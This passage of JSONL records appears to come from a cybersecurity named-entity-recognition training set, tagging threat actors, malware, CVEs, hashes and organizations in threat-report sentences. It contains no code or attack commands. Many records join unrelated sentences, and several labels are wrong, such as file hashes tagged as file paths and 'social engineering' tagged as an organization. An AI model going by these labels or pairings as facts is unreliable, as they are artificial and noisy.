The modified tool was tested with an ANEL 5.4.1 payload dropped from a malicious document with the following hash ( previously reported by FireEye ) : The malware is designed to steal browser cookies and take advantage of authenticated Facebook sessions to steal information from the victim 's Facebook account and ultimately hijack any Facebook Business account that the victim has sufficient access to .", "spans": {"SYSTEM: Microsoft Defender": [[73, 91]], "SYSTEM: Microsoft Defender Advanced Threat Protection": [[118, 163]], "ORGANIZATION: Unit 42": [[215, 222]], "THREAT_ACTOR: Gorgon Group": [[254, 266]], "MALWARE: ANEL": [[340, 344]], "ORGANIZATION: FireEye": [[442, 449]], "MALWARE: malware": [[458, 465]]}, "info": {"id": "cyberner_stix_train_005058", "source": "cyberner_stix_train"}} {"text": "It is possible that CVE-2017-8759 was being used by additional actors . March by security researchers from Kaspersky Labs .", "spans": {"VULNERABILITY: CVE-2017-8759": [[20, 33]], "THREAT_ACTOR: actors": [[63, 69]], "ORGANIZATION: Kaspersky Labs": [[107, 121]]}, "info": {"id": "cyberner_stix_train_005059", "source": "cyberner_stix_train"}} {"text": "VOODOO BEAR appears to be integrated into an organization that also operates or tasks multiple pro-Russian hacktivist entities . 
The admin@338 used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": {"THREAT_ACTOR: VOODOO BEAR": [[0, 11]], "THREAT_ACTOR: admin@338": [[133, 142]], "MALWARE: Poison Ivy RAT": [[160, 174]], "MALWARE: WinHTTPHelper": [[179, 192]], "MALWARE: malware": [[193, 200]], "ORGANIZATION: government officials": [[232, 252]]}, "info": {"id": "cyberner_stix_train_005060", "source": "cyberner_stix_train"}} {"text": "The Democratic National Committee ’s ( DNC ) June 2016 announcement attributing its network breach to the Russian Government triggered an international debate over Russia ’s sponsorship of information operations against the U.S.", "spans": {"ORGANIZATION: Democratic National Committee": [[4, 33]], "ORGANIZATION: DNC": [[39, 42]]}, "info": {"id": "cyberner_stix_train_005061", "source": "cyberner_stix_train"}} {"text": "SHA256 f19bc664558177b7269f52edcec74ecdb38ed2ab9e706b68d9cbb3a53c243dec .", "spans": {"FILEPATH: f19bc664558177b7269f52edcec74ecdb38ed2ab9e706b68d9cbb3a53c243dec": [[7, 71]]}, "info": {"id": "cyberner_stix_train_005062", "source": "cyberner_stix_train"}} {"text": "Finally , since publishing the 9002 blog , Unit 42 has also seen the aforementioned 9002 C2 used as a Poison Ivy C2 with a Myanmar political-themed lure . With the contents of the emails , included links and decoy PDFs all involving taxes , the attackers are apparently targeting the financial departments of organizations in the Balkans region . 
While Volexity does not typically engage in attempting attribution of any threat actor , Volexity does agree with previously reported assessments that OceanLotus is likely operating out of Vietnam .", "spans": {"MALWARE: 9002": [[31, 35], [84, 88]], "MALWARE: Poison Ivy": [[102, 112]], "THREAT_ACTOR: attackers": [[245, 254]], "ORGANIZATION: financial": [[284, 293]], "ORGANIZATION: Volexity": [[353, 361], [436, 444]], "THREAT_ACTOR: OceanLotus": [[498, 508]]}, "info": {"id": "cyberner_stix_train_005063", "source": "cyberner_stix_train"}} {"text": "The head of Germany ’s domestic intelligence agency , Bundesamt für Verfassungsschutz ( BfV ) , also attributed the June 2015 compromise of the Bundestag ’s networks to APT28 .", "spans": {"ORGANIZATION: Bundesamt für Verfassungsschutz": [[54, 85]], "ORGANIZATION: BfV": [[88, 91]], "THREAT_ACTOR: APT28": [[169, 174]]}, "info": {"id": "cyberner_stix_train_005064", "source": "cyberner_stix_train"}} {"text": "The pattern of infrastructure hosting suggests that the group parks its domains when not in use , an operational security technique that limits exposure of the group's overall hosting infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_train_005065", "source": "cyberner_stix_train"}} {"text": "If you follow the military analogy — those are the scouts . In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . 
In December 2015 , Symantec published a post about \" two Iran-based attack groups that appear to be connected , Cadelle and Chafer \" that \" have been using Backdoor.Cadelspy and Backdoor.Remexi to spy on Iranian individuals and Middle Eastern organizations \" .", "spans": {"VULNERABILITY: CVE-2012-0158": [[126, 139]], "TOOL: NetTraveler Trojan": [[155, 173]], "ORGANIZATION: Symantec": [[195, 203]], "THREAT_ACTOR: attack groups": [[244, 257]], "THREAT_ACTOR: Cadelle": [[288, 295]], "THREAT_ACTOR: Chafer": [[300, 306]], "MALWARE: Backdoor.Cadelspy": [[332, 349]], "MALWARE: Backdoor.Remexi": [[354, 369]]}, "info": {"id": "cyberner_stix_train_005066", "source": "cyberner_stix_train"}} {"text": "As mentioned above , the threat used to compromise the targeted networks is Poison Ivy , a Remote Access Tool ( RAT ) .", "spans": {"MALWARE: Poison Ivy": [[76, 86]]}, "info": {"id": "cyberner_stix_train_005067", "source": "cyberner_stix_train"}} {"text": "FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including government institutions .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT37": [[54, 59]], "VULNERABILITY: zero-day Adobe Flash vulnerability": [[72, 106]], "VULNERABILITY: CVE-2018-4878": [[109, 122]], "TOOL: DOGCALL malware": [[139, 154]], "MALWARE: Epic Turla": [[202, 212]], "ORGANIZATION: government institutions": [[291, 314]]}, "info": {"id": "cyberner_stix_train_005069", "source": "cyberner_stix_train"}} {"text": "Recently , FireEye released a great report on one of the more active groups , now known as APT30 . 
The second Windows vulnerability ( CVE-2017-0143 ) was patched in March 2017 after it was discovered to have been used by two exploit tools EternalRomance and EternalSynergy that were also released as part of the Shadow Brokers leak .", "spans": {"ORGANIZATION: FireEye": [[11, 18]], "THREAT_ACTOR: APT30": [[91, 96]], "SYSTEM: Windows": [[110, 117]], "VULNERABILITY: CVE-2017-0143": [[134, 147]], "VULNERABILITY: exploit": [[225, 232]], "VULNERABILITY: EternalRomance": [[239, 253]], "VULNERABILITY: EternalSynergy": [[258, 272]], "THREAT_ACTOR: Shadow Brokers": [[312, 326]]}, "info": {"id": "cyberner_stix_train_005070", "source": "cyberner_stix_train"}} {"text": "They are mostly Western names , but there were some Arabic names in a few of the samples .", "spans": {}, "info": {"id": "cyberner_stix_train_005071", "source": "cyberner_stix_train"}} {"text": "The compromised information was later leaked online .", "spans": {}, "info": {"id": "cyberner_stix_train_005072", "source": "cyberner_stix_train"}} {"text": "In particular , DHS recommends that more research should be conducted on the North Korean cyber activity that has been reported by cybersecurity and threat research firms .", "spans": {"ORGANIZATION: DHS": [[16, 19]]}, "info": {"id": "cyberner_stix_train_005073", "source": "cyberner_stix_train"}} {"text": "With the move to targeting select victims for high-value payouts , the INDRIK SPIDER adversary group is no longer forced to scale its operations , and now has the capacity to tailor its tooling to the victim 's environment and play a more active role in the compromise with \" hands on keyboard \" activity . 
ScarCruft also attacked a diplomatic agency in Hong Kong , and another diplomatic agency in North Korea .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[71, 84]], "ORGANIZATION: diplomatic agency": [[333, 350], [378, 395]]}, "info": {"id": "cyberner_stix_train_005074", "source": "cyberner_stix_train"}} {"text": "On April 27 , the attackers scanned the corporate internal network for hosts with ports 8080 , 5900 , and 40 open .", "spans": {}, "info": {"id": "cyberner_stix_train_005075", "source": "cyberner_stix_train"}} {"text": "Gaza Cybergang Group 2 with the Micropsia backdoor :", "spans": {"THREAT_ACTOR: Gaza Cybergang": [[0, 14]], "MALWARE: Micropsia backdoor": [[32, 50]]}, "info": {"id": "cyberner_stix_train_005076", "source": "cyberner_stix_train"}} {"text": "Just an hour and a half later they had compiled and delivered another AZZY x64 backdoor ( md5: 9D2F9E19DB8C20DC0D20D50869C7A373 , compiled August 4th , 2015 ) .", "spans": {"MALWARE: AZZY": [[70, 74]], "FILEPATH: 9D2F9E19DB8C20DC0D20D50869C7A373": [[95, 127]]}, "info": {"id": "cyberner_stix_train_005077", "source": "cyberner_stix_train"}} {"text": "The nativesend method uses the Java Native Interface ( JNI ) to fetch and call the Android SMS API . However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised . CloseFW Switch off Windows Firewall . 
The group appears to commonly deploy double extortion of the victims that have been listed on the leak site , several of them have had some portion of their exfiltrated data exposed .", "spans": {"SYSTEM: Android": [[83, 90]], "THREAT_ACTOR: APT20": [[137, 142]], "VULNERABILITY: zero-day exploits": [[151, 168]], "SYSTEM: Windows": [[247, 254]]}, "info": {"id": "cyberner_stix_train_005078", "source": "cyberner_stix_train"}} {"text": "In the following weeks , FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32’s tools and phishing lures . The threat actor’s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users .", "spans": {"ORGANIZATION: FireEye": [[25, 32]], "THREAT_ACTOR: APT32’s": [[159, 166]], "THREAT_ACTOR: actor’s": [[205, 212]], "TOOL: emails": [[213, 219]], "FILEPATH: malicious payload": [[266, 283]], "ORGANIZATION: users": [[348, 353]]}, "info": {"id": "cyberner_stix_train_005079", "source": "cyberner_stix_train"}} {"text": "His group configured the DCLeaks and Guccifer 2.0 blogs and social media accounts that would later be used to spread data stolen from the DNC , DCCC , and Clinton campaigns .", "spans": {"THREAT_ACTOR: DCLeaks": [[25, 32]], "THREAT_ACTOR: Guccifer": [[37, 45]], "TOOL: DNC": [[138, 141]], "TOOL: DCCC": [[144, 148]]}, "info": {"id": "cyberner_stix_train_005080", "source": "cyberner_stix_train"}} {"text": "The group also creates and maintains scheduled tasks to achieve this purpose .", "spans": {}, "info": {"id": "cyberner_stix_train_005081", "source": "cyberner_stix_train"}} {"text": "] infomavis-dracula [ . 
Until late December 2015 , in nearly every Infy message documented since our tracking began in May 2013 , no attempt included strong tailoring of the approach , often not even including an email body , instead relying on cryptic filenames and email subjects to attract interest . For example , “ shanghai ” is not a street name . Monitor for newly constructed services / daemons that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"TOOL: Infy message": [[67, 79]]}, "info": {"id": "cyberner_stix_train_005082", "source": "cyberner_stix_train"}} {"text": "Flash exploit triggers CVE-2015-3043 , executes shellcode .", "spans": {"TOOL: Flash": [[0, 5]], "VULNERABILITY: CVE-2015-3043": [[23, 36]], "TOOL: shellcode": [[48, 57]]}, "info": {"id": "cyberner_stix_train_005083", "source": "cyberner_stix_train"}} {"text": "PwC UK and BAE Systems , working closely with industry and government , have uncovered a new , unparallelled campaign which we refer to as Operation Cloud Hopper . While investigating KerrDown we found multiple RAR files containing a variant of the malware .", "spans": {"ORGANIZATION: PwC UK": [[0, 6]], "ORGANIZATION: BAE Systems": [[11, 22]], "ORGANIZATION: industry": [[46, 54]], "ORGANIZATION: government": [[59, 69]], "FILEPATH: KerrDown": [[184, 192]]}, "info": {"id": "cyberner_stix_train_005084", "source": "cyberner_stix_train"}} {"text": "It steals credentials from various FTP clients , Outlook , and Internet Explorer .", "spans": {"TOOL: Outlook": [[49, 56]], "TOOL: Internet Explorer": [[63, 80]]}, "info": {"id": "cyberner_stix_train_005085", "source": "cyberner_stix_train"}} {"text": "Many of these samples appear to be designed specifically to attempt to slip into the Play Store undetected and are not seen elsewhere . APT Anchor Panda is a Chinese threat actor group who target maritime operations . 
S-TOOLwill recognize the outgoing connection as originated by the browser instead of the ZxShell service host process . Attackers send these emails to multiple accounts , hoping that someone will believe the story , and pay up .", "spans": {"SYSTEM: Play Store": [[85, 95]], "MALWARE: ZxShell": [[307, 314]]}, "info": {"id": "cyberner_stix_train_005086", "source": "cyberner_stix_train"}} {"text": "The new Android ransomware variant overcomes these barriers by evolving further than any Android malware we ’ ve seen before . Several additional documents surfaced between January 17 and February 3 . This allows an analyst to quickly check if there are any lost blocks by control flow unflattening . one base64 encoded string but multiple , separated by a character .", "spans": {"MALWARE: Android": [[8, 15], [89, 96]]}, "info": {"id": "cyberner_stix_train_005087", "source": "cyberner_stix_train"}} {"text": "To facilitate lateral movement , the adversaries deploy ASPXTool web shells to internally accessible systems running IIS .", "spans": {"TOOL: ASPXTool": [[56, 64]], "TOOL: web shells": [[65, 75]], "TOOL: IIS": [[117, 120]]}, "info": {"id": "cyberner_stix_train_005088", "source": "cyberner_stix_train"}} {"text": "All of the victims are located in Italy . When we first discovered the OilRig attack campaign in May 2016 , we believed at the time it was a unique attack campaign likely operated by a known , existing threat group . In fact , this is one of the first checks it performs when it is executed . Cisco Talos is aware of the recent advisory published by the U.S. Department of Health and Human Services ( HHS ) warning the healthcare industry about Rhysida ransomware activity .", "spans": {"THREAT_ACTOR: threat group": [[202, 214]], "ORGANIZATION: Cisco Talos": [[293, 304]], "ORGANIZATION: U.S. 
Department of Health and Human Services ( HHS )": [[354, 406]], "MALWARE: Rhysida ransomware": [[445, 463]]}, "info": {"id": "cyberner_stix_train_005089", "source": "cyberner_stix_train"}} {"text": "In addition , admin.nslookupdns [ . APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems . In 2017 , social engineering content in lures used by the actor provided evidence that they were likely used to target members of the Vietnam diaspora in Australia as well as government employees in the Philippines .", "spans": {"THREAT_ACTOR: APT41": [[36, 41]], "ORGANIZATION: social engineering": [[210, 228]], "THREAT_ACTOR: actor": [[258, 263]], "ORGANIZATION: diaspora": [[342, 350]], "ORGANIZATION: government employees": [[375, 395]]}, "info": {"id": "cyberner_stix_train_005090", "source": "cyberner_stix_train"}} {"text": "Dragos instead focuses on threat behaviors and appropriate detection and response .", "spans": {"ORGANIZATION: Dragos": [[0, 6]]}, "info": {"id": "cyberner_stix_train_005091", "source": "cyberner_stix_train"}} {"text": "Sets file creation timestamp to that of “ %SYSTEM%\\sfc.dll ” .", "spans": {"FILEPATH: %SYSTEM%\\sfc.dll": [[42, 58]]}, "info": {"id": "cyberner_stix_train_005092", "source": "cyberner_stix_train"}} {"text": "In other words , TrickMo ’ s service will start either after the device becomes interactive or after a new SMS message is received . Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . 
During this testing , we saw document filenames that contain the C2 we witnessed in the targeted attack above , specifically the filenames XLS-withyourface.xls and XLS-withyourface – test.xls .", "spans": {"MALWARE: TrickMo": [[17, 24]], "MALWARE: Pony DLL": [[222, 230]], "MALWARE: Vawtrak": [[235, 242]], "TOOL: C2": [[397, 399]], "FILEPATH: XLS-withyourface.xls": [[471, 491]], "FILEPATH: XLS-withyourface – test.xls": [[496, 523]]}, "info": {"id": "cyberner_stix_train_005093", "source": "cyberner_stix_train"}} {"text": "For the initial infection , PLATINUM typically sends malicious documents that contain exploits for vulnerabilities in various software programs , with links or remotely loaded components ( images or scripts or templates ) that are delivered to targets only once . The exploit document carrying this alternate KeyBoy configuration also used a decoy document which was displayed to the user after the exploit launched .", "spans": {"THREAT_ACTOR: PLATINUM": [[28, 36]], "FILEPATH: exploit document": [[268, 284]], "MALWARE: KeyBoy": [[309, 315]], "FILEPATH: decoy document": [[342, 356]], "VULNERABILITY: exploit": [[399, 406]]}, "info": {"id": "cyberner_stix_train_005094", "source": "cyberner_stix_train"}} {"text": "The source code for the malware powering this botnet was eventually leaked online .", "spans": {}, "info": {"id": "cyberner_stix_train_005095", "source": "cyberner_stix_train"}} {"text": "Summary PHA authors go to great lengths to come up with increasingly clever ways to monetize their apps . The PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) . APT18 . 
The web page “ JavaApplet.html ” loads “ JavaApplet.class ” that implements a Java exploit for the recently discovered vulnerability CVE-2013 - 0422 .", "spans": {"THREAT_ACTOR: PassCV group": [[110, 122]], "TOOL: publicly available RATs": [[142, 165]], "THREAT_ACTOR: APT18": [[318, 323]], "VULNERABILITY: CVE-2013 - 0422": [[459, 474]]}, "info": {"id": "cyberner_stix_train_005096", "source": "cyberner_stix_train"}} {"text": "APT40 engages in broader regional targeting against traditional intelligence targets , especially organizations with operations in Southeast Asia . The Taidoor attackers have been actively engaging in targeted attacks since at least March 4 , 2009 .", "spans": {"THREAT_ACTOR: APT40": [[0, 5]]}, "info": {"id": "cyberner_stix_train_005097", "source": "cyberner_stix_train"}} {"text": "The first function is used for contact information stealing : the function upCon steals all contacts in the contact list and their information . The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . Honeybee appears to target humanitarian aid and inter-Korean affairs .", "spans": {"MALWARE: etool.exe": [[244, 253]], "VULNERABILITY: CVE-2017-0144": [[295, 308]], "MALWARE: MS07-010": [[334, 342]], "MALWARE: checker1.exe": [[343, 355]], "MALWARE: PsExec": [[440, 446]], "MALWARE: psexec.exe": [[467, 477]], "THREAT_ACTOR: Honeybee": [[480, 488]]}, "info": {"id": "cyberner_stix_train_005098", "source": "cyberner_stix_train"}} {"text": "This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . 
this library includes two drivers compiled on August 22 and September 4 , 2014 .", "spans": {"MALWARE: Microsoft Word attachment": [[84, 109]], "VULNERABILITY: CVE-2017-0199": [[142, 155]], "TOOL: ZeroT Trojan": [[170, 182]], "TOOL: PlugX Remote Access Trojan": [[214, 240]], "TOOL: RAT": [[243, 246]]}, "info": {"id": "cyberner_stix_train_005099", "source": "cyberner_stix_train"}} {"text": "Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability . That said , the \" fingerprints \" left on the samples by the attackers – including techniques used to achieve unauthorized code execution – suggest that the BARIUM APT is behind the effort , according to the researchers .", "spans": {"VULNERABILITY: exploit": [[65, 72]], "VULNERABILITY: CVE-2017-11882 vulnerability": [[81, 109]], "THREAT_ACTOR: BARIUM APT": [[268, 278]]}, "info": {"id": "cyberner_stix_train_005100", "source": "cyberner_stix_train"}} {"text": "They pack the malware with a powerful commercial tool called Enigma Packer and implement language checks to ensure the victims are Arabic speaking .", "spans": {"TOOL: Enigma Packer": [[61, 74]]}, "info": {"id": "cyberner_stix_train_005101", "source": "cyberner_stix_train"}} {"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . 
Taking that into account , we classify the Lamberts as the same level of complexity as Regin , ProjectSauron , Equation and Duqu2 , which makes them one of the most sophisticated Cyber Espionage toolkits we have ever analysed .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: zero-day exploits": [[144, 161]], "MALWARE: Lamberts": [[246, 254]], "MALWARE: Regin": [[290, 295]], "MALWARE: ProjectSauron": [[298, 311]], "MALWARE: Equation": [[314, 322]], "MALWARE: Duqu2": [[327, 332]]}, "info": {"id": "cyberner_stix_train_005102", "source": "cyberner_stix_train"}} {"text": "Because the rootkit resides within a computer ’s flash memory , it allows the attackers to maintain a persistent presence on a compromised machine even if the hard drive is replaced or the operating system is reinstalled .", "spans": {}, "info": {"id": "cyberner_stix_train_005103", "source": "cyberner_stix_train"}} {"text": "Gustuff advertising screenshot The companies advertised in the image above were from Australia , which matches up with the campaign we researched . The tactical malware , historically EvilGrab , and now ChChes ( and likely also RedLeaves ) , is designed to be lightweight and disposable , often being delivered through spear phishing . We are not able to calculate the total count of affected users based only on our data ; however , we estimate that the real scale of the problem is much bigger and is possibly affecting over a million users worldwide . Network traffic and process related telemetry to / from host(s ) operating the MicroSCADA software .", "spans": {"MALWARE: Gustuff": [[0, 7]], "TOOL: EvilGrab": [[184, 192]], "TOOL: ChChes": [[203, 209]], "TOOL: RedLeaves": [[228, 237]]}, "info": {"id": "cyberner_stix_train_005104", "source": "cyberner_stix_train"}} {"text": "Stealing SMS Figure 10 : Stealing SMS messages . It is noteworthy that the attackers never used the FuzzBunch framework in its attacks . 
The group uses custom malware as well as “ living off the land ” techniques .", "spans": {"THREAT_ACTOR: attackers": [[75, 84]], "TOOL: FuzzBunch framework": [[100, 119]]}, "info": {"id": "cyberner_stix_train_005105", "source": "cyberner_stix_train"}} {"text": "Confucius' operations include deploying bespoke backdoors and stealing files from their victim 's systems with tailored file stealers , some of which bore resemblances to Patchwork 's . CTU researchers have observed the threat group obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. military capability , or both .", "spans": {"THREAT_ACTOR: Patchwork": [[171, 180]], "ORGANIZATION: CTU": [[186, 189]], "ORGANIZATION: U.S. defense": [[270, 282]], "ORGANIZATION: military capability": [[400, 419]]}, "info": {"id": "cyberner_stix_train_005106", "source": "cyberner_stix_train"}} {"text": "The Dukes actively targeted Ukraine before the crisis , at a time when Russia was still weighing her options , but once Russia moved from diplomacy to direct action , Ukraine was no longer relevant to the Dukes in the same way .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9], [205, 210]]}, "info": {"id": "cyberner_stix_train_005107", "source": "cyberner_stix_train"}} {"text": "In Asia there are numerous companies producing Android-based devices and Android apps , and many of them offer users their own app stores containing programs that can not be found in Google Play . This time the group chose a national data center as its target from an unnamed country in Central Asia in an attempt to gain \" access to a wide range of government resources at one fell swoop \" . This executable is from HP and is usually installed with their printing and scanning software called “ HP Digital Imaging ” . 
So , instead of wasting time trying to figure out what is going on , I debugged the script using the browser .", "spans": {"SYSTEM: Android-based": [[47, 60]], "SYSTEM: Android": [[73, 80]], "SYSTEM: Google Play": [[183, 194]], "ORGANIZATION: HP": [[417, 419]], "TOOL: HP Digital Imaging": [[496, 514]], "TOOL: the browser": [[616, 627]]}, "info": {"id": "cyberner_stix_train_005108", "source": "cyberner_stix_train"}} {"text": "In other words , the C2 server can specify the message contents to be sent , the time period in which to forward the voice call , and the recipients of outgoing messages . Victims of BlackOasis have been observed in the following countries : Russia , Iraq , Afghanistan , Nigeria , Libya , Jordan , Tunisia , Saudi Arabia , Iran , Netherlands , Bahrain , United Kingdom and Angola . At the end , “ templates.vbs ” script will force the machine to reboot . PBI Research Services also reported a data breach that exposed information for 4.75 million people .", "spans": {"THREAT_ACTOR: BlackOasis": [[183, 193]], "FILEPATH: templates.vbs": [[398, 411]], "ORGANIZATION: PBI Research Services": [[456, 477]]}, "info": {"id": "cyberner_stix_train_005109", "source": "cyberner_stix_train"}} {"text": "Coinminer.Linux.MALXMR.SMDSL64 : 649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79 .", "spans": {"MALWARE: Coinminer.Linux.MALXMR.SMDSL64": [[0, 30]], "FILEPATH: 649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79": [[33, 97]]}, "info": {"id": "cyberner_stix_train_005110", "source": "cyberner_stix_train"}} {"text": "We have been monitoring the activities of this group and believe they are operating from China . 
Group-IB reports that MoneyTaker uses both borrowed and their own self-written tools .", "spans": {"THREAT_ACTOR: group": [[47, 52]], "ORGANIZATION: Group-IB": [[97, 105]]}, "info": {"id": "cyberner_stix_train_005111", "source": "cyberner_stix_train"}} {"text": "During 2016 , Symantec observed some overlap between the command and control ( C&C ) infrastructure used by Earworm and the C&C infrastructure used by Grizzly Steppe ( the U.S. government code name for APT28 and related actors ) , implying a potential connection between Earworm and APT28 .", "spans": {"ORGANIZATION: Symantec": [[14, 22]], "TOOL: command and control": [[57, 76]], "TOOL: C&C": [[79, 82], [124, 127]], "THREAT_ACTOR: Earworm": [[108, 115], [271, 278]], "THREAT_ACTOR: APT28": [[202, 207], [283, 288]]}, "info": {"id": "cyberner_stix_train_005112", "source": "cyberner_stix_train"}} {"text": "Of note , the macro contained a DownloadFile() function that would use URLDownloadToFileA , but this was never actually used .", "spans": {}, "info": {"id": "cyberner_stix_train_005113", "source": "cyberner_stix_train"}} {"text": "Indeed , due to its ability to hide it ’ s icon from the launcher and impersonates any popular existing apps on a device , there are endless possibilities for this sort of malware to harm a user ’ s device . The developers of Bookworm use these modules in a rather unique way , as the other embedded DLLs provide API functions for Leader to carry out its tasks . These activity groups are also unusual in that they use the same zero-day exploit to launch attacks at around the same time in the same region . 
Some TrickBot samples have used HTTP over ports 447 and 8082 for C2 .", "spans": {"TOOL: Bookworm": [[226, 234]], "TOOL: Leader": [[331, 337]], "VULNERABILITY: zero-day": [[428, 436]], "MALWARE: TrickBot": [[513, 521]], "SYSTEM: C2": [[573, 575]]}, "info": {"id": "cyberner_stix_train_005114", "source": "cyberner_stix_train"}} {"text": "In order to carry out this operation , it uses publicly available tools , including Mimikatz ( Hacktool.Mimikatz ) and an open-source tool that exploits a known Windows privilege escalation vulnerability ( CVE-2016-0051 ) on unpatched computers . Dell SecureWorks researchers unveiled a report on Threat Group-3390 that has targeted companies around the world while stealing massive amounts of industrial data .", "spans": {"TOOL: publicly available tools": [[47, 71]], "TOOL: Mimikatz": [[84, 92]], "TOOL: Hacktool.Mimikatz": [[95, 112]], "VULNERABILITY: CVE-2016-0051": [[206, 219]], "ORGANIZATION: Dell SecureWorks": [[247, 263]], "THREAT_ACTOR: Group-3390": [[304, 314]]}, "info": {"id": "cyberner_stix_train_005115", "source": "cyberner_stix_train"}} {"text": "U.S. President Donald Trump has ordered ByteDance , the parent company of TikTok , to sell its U.S. TikTok assets and also issued executive orders that would ban the social media apps TikTok and WeChat from operating in the U.S. if the sale doesn ’ t happen in the next few weeks . The attack , which starts with a malicious attachment disguised as a top secret US document , weaponizes TeamViewer , the popular remote access and desktop sharing software , to gain full control of the infected computer . 
While reviewing a 2015 report of a Winnti intrusion at a Vietnamese gaming company , we identified a small cluster of Winnti samples designed specifically for Linux .", "spans": {"ORGANIZATION: ByteDance": [[40, 49]], "SYSTEM: TikTok": [[74, 80], [100, 106], [184, 190]], "SYSTEM: WeChat": [[195, 201]], "THREAT_ACTOR: attack": [[286, 292]], "TOOL: TeamViewer": [[387, 397]], "MALWARE: Winnti": [[540, 546], [623, 629]], "ORGANIZATION: Vietnamese": [[562, 572]], "SYSTEM: Linux": [[664, 669]]}, "info": {"id": "cyberner_stix_train_005116", "source": "cyberner_stix_train"}} {"text": "Nitro 's campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes . this SWC was used to specifically target Turkish .", "spans": {"THREAT_ACTOR: Nitro": [[0, 5]], "ORGANIZATION: chemical sector": [[33, 48]]}, "info": {"id": "cyberner_stix_train_005117", "source": "cyberner_stix_train"}} {"text": "POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4.19.9.98 .", "spans": {"TOOL: POWRUNER": [[0, 8]], "MALWARE: RTF file": [[41, 49]], "VULNERABILITY: CVE-2017-0199": [[65, 78]], "FILEPATH: Cyberlink": [[130, 139]], "TOOL: Dynamic Link Library": [[182, 202]]}, "info": {"id": "cyberner_stix_train_005118", "source": "cyberner_stix_train"}} {"text": "There are two more reasons why Triada is so hard to detect and why it had impressed our researchers so much . Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets . 
It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries .", "spans": {"MALWARE: Triada": [[31, 37]], "THREAT_ACTOR: ScarCruft": [[159, 168]], "VULNERABILITY: zero-day exploits": [[202, 219]], "ORGANIZATION: telecommunications": [[418, 436]], "ORGANIZATION: defense industries": [[441, 459]]}, "info": {"id": "cyberner_stix_train_005119", "source": "cyberner_stix_train"}} {"text": "The name Spark is derived from the PDB path left in a few of the backdoor binaries :", "spans": {"MALWARE: Spark": [[9, 14]], "TOOL: PDB": [[35, 38]]}, "info": {"id": "cyberner_stix_train_005120", "source": "cyberner_stix_train"}} {"text": "This allows the application to appear legitimate , especially given these applications icons and user interface . Additionally , with the assistance of our FireEye Labs Advanced Reverse Engineering (FLARE) , Intelligence , and Advanced Practices teams , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 . 
The GCMAN group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them , using the same APT-style tools and techniques .", "spans": {"ORGANIZATION: FireEye": [[156, 163]], "ORGANIZATION: Advanced Practices": [[227, 245]], "TOOL: APT34": [[369, 374]], "THREAT_ACTOR: GCMAN group": [[381, 392]], "ORGANIZATION: banks": [[410, 415]], "ORGANIZATION: budgeting": [[441, 450]], "ORGANIZATION: accounting departments": [[455, 477]]}, "info": {"id": "cyberner_stix_train_005121", "source": "cyberner_stix_train"}} {"text": "Or thirdly , the Dukes may have invested so much into these campaigns that by the time FireEye published their alert , the Dukes felt they could not afford to halt the campaigns .", "spans": {"THREAT_ACTOR: Dukes": [[17, 22], [123, 128]], "ORGANIZATION: FireEye": [[87, 94]]}, "info": {"id": "cyberner_stix_train_005122", "source": "cyberner_stix_train"}} {"text": "Smishing : The Major Way To Distribute RuMMS We have not observed any instances of RuMMS on Google Play or other online app stores . These attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations . By simply opening the SFX archive , it is possible to notice two different files that are shown below and named respectively “ 8957.cmd ” and “ 28847 ” . 
